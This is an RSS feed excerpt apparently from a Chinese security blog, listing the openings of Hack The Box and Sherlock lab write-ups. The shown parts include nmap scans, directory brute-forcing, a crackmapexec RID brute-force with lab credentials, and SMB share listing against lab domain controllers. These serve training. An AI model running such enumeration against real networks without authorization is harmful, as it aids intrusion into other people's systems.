  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Active  
❯ nmap active.htb -sV  -Pn -T4         
                                                                                            
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49167/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;smb-file-leak&#34;&gt;SMB File Leak&lt;/h2&gt;
&lt;p&gt;匿名登陆&lt;strong&gt;SMB&lt;/strong&gt;，发现可以读取的&lt;strong&gt;Replication&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Blackfield</title>
      <link>https://www.hyhforever.top/posts/2025/01/htb-blackfield/</link>
      <pubDate>Sat, 18 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/htb-blackfield/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Blackfield  
❯ nmap Blackfield.htb -sV -T4

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;把&lt;strong&gt;BLACKFIELD.local&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Cascade</title>
      <link>https://www.hyhforever.top/posts/2025/01/htb-cascade/</link>
      <pubDate>Sat, 18 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/htb-cascade/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Cascade  
❯ nmap Cascade.htb -sV -T4    

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;把&lt;strong&gt;cascade.local&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Forest</title>
      <link>https://www.hyhforever.top/posts/2025/01/htb-forest/</link>
      <pubDate>Sat, 18 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/htb-forest/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Forest  
❯ nmap forest.htb -sV -T4
 
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.68 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;将&lt;strong&gt;htb.local&lt;/strong&gt;加入**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Headless</title>
      <link>https://www.hyhforever.top/posts/2025/01/htb-headless/</link>
      <pubDate>Sat, 18 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/htb-headless/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Headless  
❯ nmap headless.htb      

Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;进入&lt;strong&gt;5000&lt;/strong&gt;端口查看，自动跳转到一个&lt;strong&gt;support&lt;/strong&gt;路由&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/01/htb-headless/images/image-76.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/01/htb-headless/images/image-76.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Headless  
❯ dirsearch -u headless.htb:5000                                                         
Target: http://headless.htb:5000/

Starting:                                                                                                        
401 - 317B  - /dashboard                                        
200 - 2KB - /support                                          
                                                                             
Task Completed                 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;进入&lt;strong&gt;dashboard&lt;/strong&gt;，发现需要身份认证&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Resolute</title>
      <link>https://www.hyhforever.top/posts/2025/01/htb-resolute/</link>
      <pubDate>Sat, 18 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/htb-resolute/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Resolute  
❯ nmap Resolute.htb -sV -T4

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;把&lt;strong&gt;megabank.local&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Sauna</title>
      <link>https://www.hyhforever.top/posts/2025/01/htb-sauna/</link>
      <pubDate>Sat, 18 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/htb-sauna/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Sauna  
❯ nmap Sauna.htb -sV -T4 

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;把&lt;strong&gt;EGOTISTICAL-BANK.LOCAL&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-EscapeTwo</title>
      <link>https://www.hyhforever.top/posts/2025/01/htb-escapetwo/</link>
      <pubDate>Sun, 12 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/htb-escapetwo/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As is common in real life Windows pentests, you will start this box with credentials for the following account: &lt;strong&gt;rose&lt;/strong&gt; / &lt;strong&gt;KxEPkKe6R8su&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;root@kali: /home/kali/EscapeTwo  
➜   nmap EscapeTwo.htb -sV -Pn -T4
Nmap scan report for EscapeTwo.htb 

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;smb-user-crack&#34;&gt;SMB User Crack&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;root@kali: /home/kali/EscapeTwo  
➜   crackmapexec smb escapetwo.htb -u &amp;#34;rose&amp;#34; -p &amp;#34;KxEPkKe6R8su&amp;#34; --rid-brute | grep SidTypeUser

SMB    EscapeTwo.htb   445    DC01        500: SEQUEL\Administrator (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        501: SEQUEL\Guest (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        502: SEQUEL\krbtgt (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1000: SEQUEL\DC01$ (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1103: SEQUEL\michael (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1114: SEQUEL\ryan (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1116: SEQUEL\oscar (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1122: SEQUEL\sql_svc (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1601: SEQUEL\rose (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1607: SEQUEL\ca_svc (SidTypeUser)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;smb-file-leak&#34;&gt;SMB File Leak&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/EscapeTwo  
❯ smbclient -L //10.10.xx.xx -U rose

Password for [WORKGROUP\rose]:

        Sharename       Type      Comment
        --------- ---- -------
        Accounting Department  Disk      
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;在这个&lt;strong&gt;Accounting Department&lt;/strong&gt;中存在表格文件&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sherlocks-Takedown</title>
      <link>https://www.hyhforever.top/posts/2025/01/sherlocks-takedown/</link>
      <pubDate>Sat, 04 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/sherlocks-takedown/</guid>
      <description>&lt;h2 id=&#34;sherlock-scenario&#34;&gt;Sherlock Scenario&lt;/h2&gt;
&lt;p&gt;我们在网络活动中发现了一个异常模式，表明可能存在安全漏洞。我们的团队怀疑我们的系统遭到未经授权的入侵，可能会泄露敏感数据。您的任务是调查此事件。&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sherlocks-BFT</title>
      <link>https://www.hyhforever.top/posts/2024/12/sherlocks-bft/</link>
      <pubDate>Sat, 28 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/sherlocks-bft/</guid>
      <description>&lt;h2 id=&#34;sherlock-scenario&#34;&gt;Sherlock Scenario&lt;/h2&gt;
&lt;p&gt;在这个 Sherlock 中，您将熟悉 **MFT（主文件表）**取证。您将了解用于分析 MFT 工件以识别恶意活动的知名工具和方法。在我们的分析过程中，您将使用 &lt;strong&gt;MFTECmd&lt;/strong&gt; 工具解析提供的 MFT 文件，使用 &lt;strong&gt;TimeLine Explorer&lt;/strong&gt; 打开并分析解析的 MFT 的结果，并使用十六进制编辑器从 MFT 中恢复文件内容。&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sherlocks-Unit42</title>
      <link>https://www.hyhforever.top/posts/2024/12/sherlocks-unit42/</link>
      <pubDate>Wed, 25 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/sherlocks-unit42/</guid>
      <description>&lt;h2 id=&#34;sherlock-scenario&#34;&gt;Sherlock Scenario&lt;/h2&gt;
&lt;p&gt;在本 Sherlock 中，您将熟悉 Sysmon 日志和各种有用的 EventID，用于识别和分析 Windows 系统上的恶意活动。Palo Alto 的 Unit42 最近对 UltraVNC 活动进行了研究，其中攻击者利用 UltraVNC 的后门版本来维护对系统的访问。此实验室受该活动的启发，指导参与者完成活动的初始访问阶段。&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Yummy</title>
      <link>https://www.hyhforever.top/posts/2024/12/htb-yummy/</link>
      <pubDate>Tue, 24 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/htb-yummy/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Yummy  
❯ nmap yummy.htb -sSCV -Pn -T4 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 16:55 CST
Nmap scan report for yummy.htb (10.10.11.36)
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a2:ed:65:77:e9:c4:2f:13:49:19:b0:b8:09:eb:56:36 (ECDSA)
|_  256 bc:df:25:35:5c:97:24:f2:69:b4:ce:60:17:50:3c:f0 (ED25519)
80/tcp open  http    Caddy httpd
|_http-title: Yummy
|_http-server-header: Caddy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;开放端口：&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-UnderPass</title>
      <link>https://www.hyhforever.top/posts/2024/12/htb-underpass/</link>
      <pubDate>Sun, 22 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/htb-underpass/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/UnderPass  
❯ nmap underpass.htb -sSCV -Pn -T4                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-22 11:26 CST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.04 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;code&gt;TCP&lt;/code&gt;开放端口：&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sherlocks-Reaper</title>
      <link>https://www.hyhforever.top/posts/2024/12/sherlocks-reaper/</link>
      <pubDate>Sat, 21 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/sherlocks-reaper/</guid>
      <description>&lt;h2 id=&#34;sherlock-scenario&#34;&gt;Sherlock Scenario&lt;/h2&gt;
&lt;p&gt;我们的SIEM提醒我们注意一个需要立即查看的可疑登录事件。警报详细信息是IP地址和源工作站名称不匹配。您将收到事件时间范围内周围时间的网络捕获和事件日志。对给定的证据进行核化，并向SOC经理报告。&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Instant</title>
      <link>https://www.hyhforever.top/posts/2024/12/htb-instant/</link>
      <pubDate>Fri, 20 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/htb-instant/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Instant  
❯ nmap instant.htb -sSCV -Pn -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 11:39 CST
Nmap scan report for instant.htb (10.10.11.37)
Host is up (0.097s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_  256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open  http    Apache httpd 2.4.58
|_http-title: Instant Wallet
|_http-server-header: Apache/2.4.58 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.72 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;开放端口：&lt;code&gt;22&lt;/code&gt;、&lt;code&gt;80&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Fortresses-Jet</title>
      <link>https://www.hyhforever.top/posts/2024/12/fortresses-jet/</link>
      <pubDate>Thu, 19 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/fortresses-jet/</guid>
      <description>&lt;h2 id=&#34;about&#34;&gt;About&lt;/h2&gt;
&lt;p&gt;达到&lt;code&gt;HTB&lt;/code&gt;的&lt;code&gt;Hacker&lt;/code&gt;等级后可以进入&lt;code&gt;Advanced Labs&lt;/code&gt;，本文是关于&lt;code&gt;Fortresses&lt;/code&gt;（堡垒）中的&lt;code&gt;Jet&lt;/code&gt;挑战&lt;/p&gt;
&lt;h2 id=&#34;connect&#34;&gt;Connect&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;Nmap&lt;/code&gt;扫描结果如下&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Jet
❯ nmap 10.13.37.10 -T4 -Pn -sS                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 15:06 CST
Nmap scan report for jet.com (10.13.37.10)
Host is up (0.38s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
2222/tcp open  EtherNetIP-1
5555/tcp open  freeciv
7777/tcp open  cbt
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;使用浏览器打开80端口即可获得&lt;code&gt;flag&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Chemistry</title>
      <link>https://www.hyhforever.top/posts/2024/12/htb-chemistry/</link>
      <pubDate>Tue, 17 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/htb-chemistry/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
